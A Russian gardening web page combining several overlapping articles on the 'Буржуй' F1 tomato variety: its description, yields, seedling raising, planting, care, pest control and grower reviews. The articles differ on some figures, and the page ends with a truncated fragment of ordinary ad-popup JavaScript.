0 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Томат буржуй характеристика и описание сорта

Томат буржуй, особенности сорта, описание посадка и уход

В XVII веке европейцы получили из Америки в свое пользование семена томатов. Первое время растение считалось декоративным. Помидоры не ели, они в умеренном климате некоторых стран не успевали поспевать в открытом грунте.

Однако, в более южных странах, таких как Италия, растениям хватало солнца и тепла для созревания. Итальянцы одними из первых начали употреблять томаты в пищу. В странах с умеренным климатом выращивать томаты на еду стали после того, как русский ученый Болотов А. Т. ввел рассадный метод посадки томатов и дозаривание плодов.

С того времени томаты стали растить для еды повсеместно. В настоящее время количество сортов и гибридов томатов исчисляется сотнями. Один из достаточно новых сортов — это томат буржуй, постараемся узнать о его достоинствах и недостатках.

Томат буржуй, описание сорта и его особенности

Томат буржуй является гибридом со средним сроком созревания, который получен в 2003 году. На 110 — 115 день после того, как семена сорта буржуй, посеянные на рассаду, дружно взойдут, наступает созревание плодов. Гибрид имеет достаточно мощные и крепкие побеги высотой до 0,8 — 0,9 метра.

Плоды достаточно крупные. Средняя масса их доходит до 0,3 кг. При соблюдении агротехники не редкость и плоды весом 0,4 кг. Форма томатов округлая, слегка сплюснутая. Окраска красная. Кожица гладкая, с глянцевым блеском. Мякоть плотная, мясистая. Основное назначение — употребление в свежем виде, использование в овощных салатах.

Помидоры буржуй имеют достаточно высокую урожайность. С одного гектара можно убрать до 90 тонн, а при благоприятных условиях урожайность повышается до 120 т. Помидоры буржуй хорошо дозревают при сборе плодов зелеными. Гибрид можно рекомендовать для промышленного профессионального выращивания, а также для личных подсобных и мелких фермерских хозяйств.

Достоинствами сорта являются:

  • дружная отдача урожая
  • длительный срок плодоношения
  • отличные вкусовые качества
  • привлекательный товарный вид
  • хорошая лежкость до 45 суток без утраты качества
  • толерантность к транспортировке на большие расстояния

Выращивание томатов буржуй имеет много общего с выращиванием помидоров других сортов, но есть несколько агротехнических приемов, которые помогут получить хороший урожай этих помидоров.

Как посадить томаты Буржуй F 1 на рассаду

Для посадки помидоров Буржуй F 1требуется выращивание рассады. Этот метод применятся как для выращивания в открытом, так и в закрытом грунте. В некоторых южных областях допустим посев семян сразу в грунт. Сроки посева рассады гибрида Буржуй зависят от климатических и погодных условий региона. Не стоит сеять семена томатов буржуй раньше 15 февраля и позже 15 апреля. Чтобы правильно рассчитать сроки посева на рассаду, нужно ориентироваться на дату поздних заморозков в регионе.

В областях рискованного земледелия это первая декада июня. От этой даты нужно отсчитать назад 55 — 65 дней и в эти сроки провести посев помидоров на рассаду.Например, если поздние заморозки наблюдались в предыдущем сезоне 10 июня, то лучшим временем посева томатов буржуй будет первая неделя апреля.

Многие производители проводят подготовку семян к посадке. В этом случае их можно сразу высевать. Если семена такой обработке не подвергались, то их можно замочить на пару часов в растворе марганцовки.

При этом все всплывшие на поверхность семена нужно убрать, скорее всего, они утратили свою всхожесть. Посев рассады можно первоначально осуществлять в общие лотки или ящики. При посеве в общий ящик желательно чтобы на каждый проросток приходилось 3 — 4 кв. см площади.

При таком посеве можно обеспечить полноценное питание помидорным всходам. Если планируется производство томатов сорта Буржуй для реализации населению, то важно знать, чтобы получить посадочный материал для 1 га земли потребуется высадить на рассаду 350 г семян.

До появления всходов температура в помещении должна быть от + 20 до + 25. Как только появится большее число проростков, на 5 — 6 дней нужно понизить температуру до + 10 + 15 градусов. Это послужит стимуляцией к наращиванию корешков и переходу всходов на автотрофное питание. После появления первого настоящего листа температуру вновь повышают. В стадии 3 настоящих листьев рассаду нужно рассадить в индивидуальные горшочки объемом до 0,5 л.

В этих горшках помидоры будут расти до пересадки на грядку. Желательно не упустить сроки пересадки и провести её до появления 4 и 5 настоящих листочков. При пересадке грунт в ящике с рассадой увлажняют, а в новых горшках рассаду заглубляют до семядольных листочков. Такой метод позволит томатам сорта буржуй развить корневую систему из боковых корешков, а в дальнейшем избежать замедления роста при пересадке в открытый грунт.

Некоторые приемы ухода за томатами Буржуй F 1

При подготовке грядки под выращивание томатов её нужно перекопать на штык лопаты. Лучшими предшественниками для помидоров будут:

Не стоит сажать помидоры если в предыдущие три — четыре года на участке росли картошка, перцы, баклажаны, физалис. Под перекопку нужно внести органические удобрения. Достаточно одного ведра перепревшего навоза на кв. метр. Органические вещества вносят в соответствии с инструкцией к ним.

На сегодня одним из лучших удобрений для томатов сорта буржуй многие огородники считают кемиру универсал финского производства. Её же можно использовать и для жидких подкормок в период роста и цветения томатов. Как и все томаты, кусты гибрида Буржуй отзывчивы на окучивание и рыхление земли.

Чтобы помидоры были особо крупными, часть завязи на кистях нужно удалить. Учитывая, что гибрид является одним из самых устойчивых к вершинной и корневой гнили, вертициллезу, то особых проблем с выращиванием этих томатов не бывает.

Видео о правильном уходе за томатами:

Характеристика и описание томата «Буржуй»

Многие дачники пытаются подобрать такой сорт помидоров для своих участков, который бы не требовал сложного ухода и при этом давал хороший урожай. Такими характеристиками обладает томат Буржуй, который стал лидером среди детерминантных сортов.

Он легко адаптируется к условиям выращивания, а его плоды отличаются отменным вкусом.

Описание сорта

Томат Буржуй был выведен в 2002 году украинскими специалистами. В 2004 году сорт внесли в реестр РФ. В средней полосе и южных областях его успешно выращивают в условиях незащищенного грунта, а в северных регионах — в теплицах.

Томат Буржуй относят к сортам среднего срока созревания плодов. Урожай начинают собирать через 110-115 дней после прорастания семян. Кусты имеют мощные, крепкие побеги. Они густо усыпаны листьями темно-зеленого цвета. Растение штамбовое, достигает в высоту 0,8-1,2 м.

Соблюдение правил агротехники позволяет вырастить достаточно крупные плоды, вес которых достигает 300-400 г. Они имеют округлую форму. По мере созревания помидоры приобретают красный цвет. У них гладкая и блестящая кожица, устойчивая к растрескиванию. Мякоть сочная и мясистая, обладает приятным кисло-сладким вкусом.

При благоприятных условиях урожайность томата Буржуй повышается. На кустах образовываются многочисленные завязи. Правильный уход позволяет собрать с 1 м 2 10-12 кг плодов.

Вредители и болезни

Томат Буржуй характеризуется высокой устойчивостью к наиболее распространенным болезням. Он редко поражается вершинной и корневой гнилью, вертициллезным увяданием. Из вредителей помидоры чаще всего подвергается нападению слизней, колорадского жука и паутинного клеща.

В целях профилактики кусты обрабатывают бордоской жидкостью. Для борьбы с паутинным клещом используют мыльный раствор, которым обрабатывают все части растения. Чтобы на помидорах сорта Буржуй не поселился колорадский жук, их опрыскивают инсектицидом, например препаратом «Престиж». Он не только защищает томаты от вредоносных насекомых, но и обладает противогрибковыми свойствами.

Для уничтожения слизней применяют метальдегид или медный купорос. Эффективным средством является смесь гашеной извести и древесной золы в соотношении 1:4. Томаты можно обработать табачной пылью. Поздно вечером, когда слизни выползают из своих укрытий, их собирают вручную и уничтожают.

Предназначение помидоров

Томат Буржуй выращивают не только на приусадебных участках, но и в фермерских хозяйствах для реализации населению. Зеленые помидоры быстро дозревают. Они хранятся до 45 дней без потери качества.

Плоды сорта Буржуй употребляют в свежем виде, из них готовят овощные салаты. Спелые помидоры используют для приготовления томатного сока, цельноплодного консервирования и бочковых засолок.

Достоинства и недостатки сорта

К достоинствам томата Буржуй относятся следующие особенности:

  • дружное созревание плодов;
  • продолжительный срок хранения;
  • отличные вкусовые качества;
  • привлекательный товарный вид помидоров;
  • универсальность использования;
  • длительный период плодоношения;
  • устойчивость к неблагоприятным условиям;
  • высокий иммунитет;
  • хорошая транспортабельность плодов.

Среди недостатков сорта можно отметить ломкость стеблей. Поэтому кусты необходимо подвязывать к опоре. Показатели урожайности томата Буржуй считаются не самыми высокими среди среднерослых сортов.

Выращивание помидоров

Выращивание разных сортов помидоров имеет много общего. Уход за томатом Буржуй заключается в рыхлении, регулярном поливе, внесении удобрений, формировании куста, своевременной борьбе с заболеваниями и вредителями.

Посев семян на рассаду

Выращивание томата Буржуй начинается с посева семян. В южных областях допустима посадка семечек в открытый грунт. В помещении их сажают не раньше 15 февраля, но не позже 15 апреля. Срок посева рассады зависит от климатических условий региона. Необходимо ориентироваться на дату возвратных заморозков прошлого года. От нее отсчитывают 55-65 дней. Полученный результат считается оптимальным сроком посева томатов на рассаду.

Этап подготовки семян включает прогрев, который способствует появлению дружных всходов. Сухие семечки подвергают воздействию переменных температур:

  1. 48 часов посевной материал выдерживают при температуре +30°С.
  2. Затем семена оставляют на 72 часа при показателях термометра +50°С.

Для обеззараживания семечки погружают на 30 минут в 1% раствор марганцовки. Всплывшие на поверхность семена убирают, а оставшиеся — промывают чистой водой.

Для посева томата Буржуй используют ящики или отдельные емкости с дренажными отверстиями. Отток лишней жидкости предупреждает поражение ростков черной ножкой. Тару заполняют питательной, рыхлой почвой. Для приготовления субстрата понадобятся такие компоненты:

  • огородная земля — 2 части;
  • торф — 1 часть;
  • перегной — 1 часть;
  • речной песок — 1 часть.

Перед посевом почву тщательно увлажняют. В общий ящик семена сажают так, чтобы на каждый росток приходилось 3-4 см 2 площади. Такое размещение позволит всходам правильно развиваться и получать полноценное питание. В теплице посев производят рядами, чтобы ростки равномерно освещались.

Посевы размещают в светлом месте, накрыв полиэтиленовой пленкой для уменьшения испарения влаги. До появления ростков в помещении поддерживают температуру в пределах +20…+25°С. Когда семена взойдут, ее показатели понижают до +12…+16°С. Такой скачек температуры воздуха стимулирует наращивание корневой системы. Пленку снимают, а растения регулярно поливают, не допуская пересушивания субстрата. Увлажнение почвы лучше проводить распыляемой струей. Когда появится первый настоящий листок, температуру воздуха вновь повышают до оптимальных показателей.

Ростки рассаживают в отдельные стаканчики или горшочки, когда на них появится 2-3 листа. Растения заглубляют в почву до уровня семядольных листков и поливают отстоянной водой. Перед высадкой в открытый грунт пикированные томаты закаливают в естественных условиях на протяжении 7-10 дней.

Посадка рассады

В открытый грунт рассаду сорта Буржуй пересаживают в начале июня, когда минует угроза заморозков. Приготовленные лунки хорошо поливают из расчета 1 л воды на 1 росток. Рассаду извлекают из стаканчиков с комом земли и сажают на глубину до уровня первых листков. Грунт вокруг растений уплотняют и поливают теплой водой. Томаты Буржуй сажают рядами на расстоянии 30-40 см друг от друга, оставляя междурядья шириной 30-50 см. Густота посадок составляет 3-4 растения на 1 м 2 .

Часто томат Буржуй выращивают под прозрачной пленкой. Сочетание такого укрытия с паровыми грядами позволяет пересаживать рассаду в начале мая, благодаря чему можно получить ранний урожай. Чтобы сделать такой парник, на дно выкопанной ямы помещают слой разогретого навоза толщиной 5-6 см. Сверху биотопливо присыпают слоем почвы высотой 15 см. Над паровыми грядами размещают каркас, укрытый пленкой. Ухаживают за растениями в теплице так же, как и на огороде.

Особенности ухода

Участок под посадку томата Буржуй заранее перекапывают на штык лопаты. Для повышения плодородности почвы вносят удобрения. На 1 м 2 необходимо 9-10 кг органики: компоста, перегноя, торфа или птичьего помета. Весной в грунт вносят 40-50 г суперфосфата и 30-40 г калийных удобрений, которые рассчитаны на 1 м 2 .

К лучшим предшественникам томатов относят такие овощи:

Не следует выращивать томаты Буржуй на участке, где раньше росли баклажаны, перец, картошка и физалис. После них помидоры сажают не раньше, чем через 3-4 года. Иначе они могут поражаться заболеваниями и вредителями.

Место высадки рассады должно быть светлым, т.к. томаты не переносят затенения. Для их культивирования выбирают южный участок. На одном месте сорт Буржуй выращивают не более 2-3 лет, регулярно внося комплексные удобрения.

Первый раз окучивание томатов проводят через 9-11 дней после пересадки, предварительно увлажнив грунт. Второе окучивание производят спустя 16-20 дней после первого. Такая процедура способствует наращиванию новых корней у основания стебля.

Для завязывания и роста плодов томату Буржуй необходимо достаточное количество влаги. Растения лучше поливать в вечернее время или пасмурную погоду. Почву увлажняют по мере подсыхания, а также непосредственно перед внесением удобрений. Чтобы предупредить образование корки, грунт рыхлят после каждого полива, но не реже чем 1 раз в 14 дней. Во время прополки грядок удаляются сорняки.

Несмотря на устойчивость к вирусным и грибковым заболеваниям, томаты Буржуй нуждаются в проведении профилактических мероприятий. Их опрыскивают фунгицидными препаратами и раствором марганцовокислого калия.

Первый раз подкормку проводят через 10-14 дней после пересадки рассады. Для приготовления питательной смеси понадобится 10 л раствора коровяка и 20 г суперфосфата. Такого объема достаточно на 10 кустов. Последующие подкормки проводят с интервалом в 14 дней. На 1 м 2 вносят 20 г суперфосфата, 10 г аммиачной селитры и 15 г калийной соли. В течение лета томаты подкармливают 3-4 раза комплексным удобрением.

Кусты сорта Буржуй формируют в 2-3 стебля. Чтобы увеличить количество завязей и ускорить вызревание плодов, томаты пасынкуют. Лишние побеги удаляют руками.

Кусты подвязывают к кольям или натянутой между рядами веревке. Опоры устанавливают на расстоянии 10-12 см от центрального стебля, придерживаясь северной стороны. Томаты фиксируют к кольям в 3 захода:

  • над первым листом;
  • на уровне второй цветочной кисти;
  • возле третьего соцветия.

Если сорт Буржуй выращивают на шпалере, колья вбивают на расстоянии 4 метра друг от друга. Между ними натягивают веревку. При изобилии плодов стебли укрепляют отдельными подпорами.

Сбор урожая

За 3 недели до окончания сбора урожая удаляют побеги с цветущими бутонами. Такой прием способствует массовому созреванию помидоров. Их снимают с кустов до того, как показатели ночной температуры опустятся ниже +8°С.

Во время осеннего похолодания увеличивается риск поражения растений грибковыми болезнями, прекращается образование завязи и дозревание плодов. Помидоры Буржуй можно собрать не красными, а бурыми. Они дольше хранятся, т.к. постепенно доходят до нужной кондиции.

Отзывы

Томат Буржуй стал фаворитом среди сортов, которые растут на моем огороде. Он не требует сложного ухода, хорошо переносит резкое похолодание и летнюю жару, редко поражается болезнями. Собираю всегда отличный урожай. Размер плодов идеально подходит для консервирования в целом виде.

Выращиваю томат Буржуй на протяжении нескольких лет. Кусты крепкие, среднерослые. Стебли ломаются под весом плодов. Приходится регулярно их подвязывать. Помидоры на вкус кисло-сладкие, ярко-красного цвета. Большим плюсом считаю длительный период хранения собранного урожая.

Сажаю томат Буржуй на приусадебном участке из-за его вкусных плодов и неприхотливости сорта. Мякоть помидоров очень сочная. Всегда заготавливаю на зиму томатный сок, а плоды засаливаю бочковым способом. Помидоры сохраняют свои отличные вкусовые качества и в консервированном виде. Также они хороши в свежих салатах.

Сорт Буржуй пользуется большой популярностью не только у огородников-любителей, но и у фермеров, которые выращивают помидоры на продажу и для переработки. Соблюдение приемов агротехники позволяет получить богатый урожай отменных плодов. Нетребовательный в уходе томат Буржуй сможет выращивать даже новичок.

Фото, отзывы, описание, характеристика, урожайность сорта помидора «Томат Буржуй»

Большинство владельцев дачных участков мечтают выращивать высокоурожайные и неприхотливые томатные сорта. Именно такие характеристики есть у томата «Буржуй», занимающего лидирующие позиции среди детерминантных сортов. Помимо перечисленных достоинств, томатный сорт «Буржуй» обладает устойчивостью к температурным перепадам и дефициту влаги.

Обзор томатов на 25 июля:

Происхождение сорта томата «Томат Буржуй»

Томатный сорт «Буржуй» вывели одесские селекционеры (Украина) в 2002 году. После успешной сертификации на территории России в 2003 году, был официально зарегистрирован в Госреестре РФ в 2004 году.

Описание сорта

Плоды:

  • Округлой, немного приплюснутой формы;
  • Красной окраски;
  • С гладкой, глянцевой кожицей;
  • С плотной, мясистой мякотью;
  • Количество семенных камер — 4-6 и более;
  • Содержание сухих веществ от 5 до 6%;
  • Крупных размеров.

Кусты:

  • Детерминантное, штамбовое растение, сильно облиственное;
  • Высота варьируется от 80 до 150 см;
  • Листья средних размеров, темно-зеленой окраски;
  • Соцветие простое.

Томаты: достоинства и недостатки

К основным положительным качествам томатного сорта «Буржуй» относят:

  • Устойчивость к температурным перепадам;
  • Засухоустойчивость;
  • Невосприимчивость к основным заболеваниям;
  • Универсальное назначение плодов;
  • Хорошую лежкость и транспортабельность.

Самый важный секрет большого урожая томатов:

Но у томата есть и недостатки:

  • Невысокая урожайность;
  • Повышенная ломкость ветвей.

Применение плодов

Томаты используют для бочковых засолок. Также употребляют в свежем виде. Хорошее сочетание кислот и сахаров позволяет использовать плоды для производства вкусного и полезного сока.

Выращивание помидоров

Выращивают томатный сорт «Буржуй» через рассаду.

Как подготовить семена:

  • Чтобы появились дружные всходы, семенной материал прогревают. На сухой посадочный материал воздействуют переменными температурными режимами: на протяжении двух суток семена выдерживают при температуре +30 °С. После семенной материал оставляют на трое суток при температуре +50 °С;
  • Для дезинфекции семена замачивают на пол часа в бледном растворе марганцовки. Затем промывают в чистой воде.

Посев семенного материала:

  1. К посеву приступают за 55-65 дней до предполагаемой высадки;
  2. Для высевания семенного материала можно использовать ящики либо отдельные контейнеры, в которых должны быть дренажные отверстия. Это позволит предотвратить возможное возникновение черной ножки;
  3. Ёмкости наполняют питательным, рыхлым грунтом. Чтобы приготовить почвосмесь, необходимы две части дерновой земли, по одной части торфа, перегноя и речного песка;
  4. Высевают в хорошо увлажненную почву, располагая на 1 см 2 3-4 семечка. Благодаря такому размещению всходы будут правильно развиваться и обеспечены полноценным питанием;
  5. Контейнеры помещают в светлое помещение, используя в качестве укрытия пленку, чтобы не испарялась влага. Необходимый температурный режим от +20 до +25 °С;
  6. После появления ростков укрытие снимают и понижают температуру до +12…+16°С. Это способствует наращиванию корневой системы;
  7. Всходам необходим регулярный полив, почва не должна пересыхать. Для полива использовать пульверизатор;
  8. Как только появится первый листочек, снова повышают температурный режим. Рассаду пикируют по отдельным стаканчикам после формирования 2-3 листков;
  9. За 7-10 дней до пересадки на постоянное место саженцы закаливают.

Правила высадки рассады:

  • К высадке рассада готова при наличии 4 листочков. В незащищенный грунт саженцы пересаживают в первых числах июня, после минования угрозы возвратных заморозков;
  • Почву подготавливают с осени, перекопав на штык лопаты. Чтобы повысить плодородность, почву удобряют. На 1 м 2 вносят 9-10 кг органики: компост, торф либо птичий помет. Уменьшают кислотность грунта при помощи внесения извести — на 1 м 2 от 0,5 до 0,9 кг;
  • Весной удобряют суперфосфатом и калийными удобрениями, из расчета 40-50 г и 30-40 г на 1 м 2 . Отдавать предпочтение участкам после капусты, бобовых, лука, моркови, огурцов;
  • Ширину междурядья оформляют 30-50 см, посадочные лунки располагают с интервалом 30-40 см. На 1 м 2 высаживают 3-4 кустика;
  • Посадочные лунки обильно поливают (литр воды на один куст). Рассаду высаживают вместе с земляным комом до уровня первых листочков;
  • Почву вокруг саженцев уплотняют и поливают теплой водой.

Уход за кустами

Мероприятия по дальнейшему уходу стандартные:

  • Первое окучивание осуществляют спустя 9-11 дней после высадки, заранее увлажнив почву. Второй раз окучивают через 2-3 недели после первого. Благодаря процедуре наращиваются новые корни у основания стебля;
  • Томат нуждается в достаточном количестве влаги. Полив осуществлять желательно вечером либо в пасмурный день. Грунт нуждается в увлажнении как только начнет подсыхать, а также перед подкормкой;
  • Для предупреждения образования корки, почву нужно рыхлить после каждого полива, с периодичностью раз в две недели. Прополка позволяет избавиться от сорной травы;
  • Несмотря на отличный иммунитет, не стоит пренебрегать профилактическими опрыскиваниями, используя фунгицидные препараты и марганцовый раствор;
  • Первую подкормку осуществляют спустя две недели после высадки. Чтобы приготовить питательную смесь потребуется 10 л раствора коровяка и 20 г суперфосфата. Этого хватит для подкормки 10 кустиков. В дальнейшем подкармливают с периодичностью раз в две недели. На 1 м 2 понадобится 20 г суперфостфата, 10 г аммиачной селитры и 15 г калийной соли. За сезон проводят 3-4 подкормки комплексным удобрением;
  • Кусты нуждаются в подвязывании, а ветви в надежных подпорках, которые препятствуют их обламыванию. Формирование куста осуществляют в 2-3 стебля, в большинстве случаев в три.

Болезни и вредители

Наличие отменного иммунитета, не освобождает от проведения профилактических мероприятий:

  • Рекомендовано обязательное соблюдение режима полива и освещения, своевременное рыхление и подкормка;
  • Чаще всего на томат нападает паутинный клещик и слизни. В борьбе с клещиком эффективно применение крепкого мыльного раствора, которым протирают пораженные вредителем части растения. При помощи смывания создается непригодная среда для жизни клещиков. В южных районах распространенный вредитель — колорадский жук.

Урожайность

При надлежащем уходе получают с куста примерно 3 кг урожая. При соблюдении рекомендуемой плотности посадки урожайность с 1 м 2 составляет 12 кг.

В каких регионах лучше выращивать?

Томатный сорт «Буржуй» успешно выращивается в южных районах и в средней полосе, как в незащищенном, так в закрытом грунте.

Отзывы о сорте от тех, кто сажал

С момента своего появления томатный сорт «Буржуй» с каждым годом набирает популярность не только среди владельцев приусадебных участков, но и фермеров, которые культивируют томатную культуру в больших масштабах для переработки и для продажи.

Томатный сорт «Буржуй» отличается неприхотливостью в уходе, а также высокой устойчивостью к основным заболеваниям. Если соблюдать все приемы агротехники можно собрать обильный урожай плодов отменного качества.

Описание и фото томата Буржуй, отзывы о сорте

Украинский томатный сорт «Буржуй» появился в продаже в начале 2000-х годов. За это время томаты «завоевали» сердца многих садоводов. Они прекрасно выращиваются как в южных регионах, так и в средней полосе страны. Томаты «Буржуй» можно сажать в открытый грунт, сорт не боится похолодания.

Помидоры применяются для различных целей: их можно солить, мариновать, делать из них салаты. Томатная мякоть имеет сладкий вкус и отличается сочностью.

Характеристика и описание сорта

Детерминантный куст достигает длину до 1,5 метра. Стебель мощный, но нуждается в подвязке. С одного куста собирают до 4 килограммов томатов. Сажают растения из расчета 3-4 куста на 1 квадратный метр земли.

Помидоры имеют упругую кожуру красного цвета. Она надежно защищает помидоры от повреждений и вмятин. Плоды среднего размера весят порядка 200 граммов, но иногда встречаются и более крупные представители сорта.

Для «Буржуя» приемлемы оба способа посадки: открытый грунт и теплица. Сорт обладает хорошими иммунными свойствами: растения не болеют грибковыми и другими помидорными заболеваниями.

«Буржуй» — среднеспелый сорт, первые помидоры поспевают спустя 100-110 дней после пересадки рассады в почву. При правильном уходе и хороших погодных условиях возможно более раннее поспевание.

Особенности выращивания

После того, как семена будут приобретены, их начинают готовить к посадке. Для начала, их перебирают: мелкие и некрасивые зерна убирают. Разводят раствор марганцовки розового цвета. Отобранные семена кладут на ткань, складывают в мешочек и опускают в раствор на 5-10 минут. Обработанные марганцовкой зерна промывают водой.

На поддон с высотой бортиков не менее 3 сантиметров укладывают влажную ткань. Можно сложить марлю в несколько слоев. Ткань замачивают в растворе гумата калия или любого другого удобрения, стимулирующего рост растений. На смоченную удобрением ткань выкладывают семена, закрывают пленкой и оставляют на несколько дней при комнатной температуре. Через пару дней семена прорастают и готовы к пересадке в землю.

Для выращивания рассады подойдут деревянные ящики или пластиковые контейнеры. Ящики заполняют землей. В землю обязательно добавляют кальций – размельченный мел или яичную скорлупу. Помидоры хорошо растут в пористой почве, поэтому добавляют немного речного сухого песка и перегноя.

Семена опускают в землю на небольшою глубину и увлажняют почву. Во время выращивания рассаду обеспечивают регулярным поливом. Помимо полива ящики с помидорами устанавливают поближе к источнику света.

Через месяц после посадки рассаду пикируют. Пикировка проводится по желанию и не является обязательным пунктом для выполнения. Процедура проводится с целью замедлить рост и вытягивание рассады. Пикируют растения с 4-6 листами из влажной земли в отдельные емкости большего диаметра. Землю с корней полностью отделять не нужно. После пикировки помидоры проливают разведенным гуматом натрия.

К посадке томатов в теплицу приступают в начале мая. Помидоры хорошо приживаются в подкисленной почве с рН = 6-6,5.

Стаканчики опускают в ведро с растворенным коровяком или куриным пометом. Намокшую землю с растением вынимают из стакана и опускают в выкопанную ямку. После пересадки немного мульчируют почву опилками. Мульчирование защищает грунт от переувлажнения, опилки мгновенно впитывают избыток воды, а затем высыхают. Более того, улучшается воздухообмен, корням обеспечивается постоянный доступ кислорода.

Когда куст достигнет роста 35-40 сантиметров, его подвязывают. В теплице подвязку осуществляют к шпалере. Для выращивания в открытом грунте используют колышки длиной 70-90 сантиметра. Подвязка уменьшает образование пасынков и позволяет молодому растению полноценно развиваться.

Поливают томаты регулярно. Частота полива зависит от наружной температуры воздуха. При засухе поливают томаты один раз в два дня. Если на улице стоит дождливая погода, то одного раза в неделю вполне хватит.

Для обильного роста помидоры опрыскивают настоями лука, куриного помета. Настойки готовятся просто: 3 измельченные головки лука или 200 граммов куриного помета заливают ведром воды и настаивают 2 суток. Затем смесь фильтруют и опрыскивают помидорные стебель и листья один раз в десять дней. При регулярном опрыскивании снижается вероятность заболеть, и повышаются защитные свойства.

Сбор урожая и его хранение

К концу лета помидоры в теплице начинают созревать. Собирают только спелые плоды, остальные оставляют зреть. Обычно большинство помидоров зреет к середине августа. Если томаты были посажены в открытый грунт, то их срывают зелеными. Затем недоспевшие плоды кладут в теплое светлое место и оставляют там на неделю. Помидоры по мере поспевания переворачивают, чтобы окраска получилась однородной.

Хранят спелые красные томаты в прохладном месте. Если помидор на ощупь становится мягким, то его необходимо немедленно использовать, иначе он испортится. Красные помидоры могут храниться до одной недели. Помимо нарезки в салаты и приготовления солений, томаты можно заморозить на зиму. Они прекрасно держат форму и не повреждаются при низкой температуре. Оттаявшие помидоры добавляют в различные блюда, они не изменяют своих вкусовых свойств.

Достоинства и недостатки

  • красивая форма и сочный сладкий вкус;
  • устойчивость к холодам, возможность посадки на улице;
  • хорошая урожайность;
  • иммунитет к овощным болезням;
  • универсальное применение.

Недостатков у томатов сорта «Буржуй» замечено не было.

Отзывы

Виталий из Новосибирска говорит: «Помидоры сорта Буржуй имеют насыщенный вкус и приятный аромат. Их можно использовать для засолки, приготовления лечо, томатного сока. Выращиваю данный сорт уже два года подряд и буду охотно продолжать».

Альбина добавляет: «Сорт очень понравился из-за своей неприхотливости в выращивании. Помидоры сажала в открытый грунт. Результат получился хорошим: на одном кусте росло по 4-5 веток с помидорами. Советую к посадке».

Выращиваем вкусные томаты Буржуй F1 вместе с нами — описание сорта и его характеристики

Томат Буржуй f1 радует садоводов не только изобилием вкусных плодов. Устойчивость к болезням, возможность выращивания без пленки – неоспоримые преимущества для детерминантного лидера.

Высота Место посадки Сроки созревания Цвет плодов Размер плодов Происхождение Форма плода
Среднерослый Теплица, Открытый грунт Среднеспелые Красные Крупный Сорт Плоскоокруглые

Описание и характеристика сорта

Буржуй – томат со средними сроками созревания, помидоры поспевают через 105-115 дней от всходов. Кусты среднерослые, штамбовые, вырастают до 1 м. Побеги и листья темно-зеленые. На 1 растении до 7-8 кистей с помидорами. На каждой плодоносной ветви 5-6 плодов.

Томат Буржуй от «Седек» – высокоурожайный сорт, с крупными помидорами со средним весом 200-350 г. Плоды округлой формы окрашены в насыщенный ярко-красный цвет. Прочная кожица имеет глянцевый отлив и не растрескивается. Сочная мякоть сладковатая на вкус с легкой кислинкой.

Страна выведения и год регистрации

Томат появился на свет в Украине в 2002 г, в РФ был внесен в реестр в 2004.

В каких регионах лучше выращивать?

Рекомендован для посадок в открытых условиях – на юге и в центральных областях, на севере выращивают под пленкой.

Преимущества и недостатки

  • товарный вид;
  • превосходные вкусовые качества;
  • полезный состав;
  • щедрые урожаи;
  • крупноплодность;
  • выносливость к жаре и температурным скачкам.

Минусы:

Урожайность

Томат приносит с 1 м2 12-14 кг, с 1 куста 4-4,5 кг. Помидоры используют универсально:

  • для консервации дольками и целиком;
  • для соусов и соков;
  • для нарезок и салатов в свежем виде.

Особенности выращивания и хранения

Помидоры выращивают через рассаду. На грядки пересаживают в возрасте 2-х месяцев при наличии не менее 7 настоящих листиков. Посадки не загущают – на 1м2 размещают 3 куста.

Уход проводят в соответствии со следующими рекомендациями:

  • полив под корень 3 раза в неделю, норма на 1 куст — 3 л;
  • прополка и рыхление;
  • мульчирование соломой, опилками, сидератами;
  • формировка в 2 стебля для крупных плодов, ведение в 1 побег для плодов-гигантов;
  • пасынкование раз в 10 дней;
  • подкармливание после высадки через 10 дней, в фазе цветения, формирования завязей, созревания помидоров.

Посадка и уход

Чтобы получить достойный урожай, рассаду выращивают из качественных семян, соблюдая правила.

Посев семян на рассаду

Семена высевают в 1-2 декаде марта. Предварительно их замачивают на 10 минут в 1% марганцовке, затем промывают. Оставляют проращиваться во влажной дышащей ткани на 5 дней до появления росточков.

Посадка рассады

  • Семена высевают на глубину 1,5 см, ширина между заделом 2см.
  • Контейнеры накрывают пленкой и убирают до всходов в теплое место.

Особенности ухода

Рассаду выращивают при температурном режиме 22-24 °С. Уход включает несколько моментов.

  • Освещают фитолампами до продолжительности светового дня 10-12 часов.
  • Орошают через пульверизатор теплой водой.
  • Пикируют при наличии 3-х настоящих листочков.
  • Закаливают при 15 °С на протяжении недели.
Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
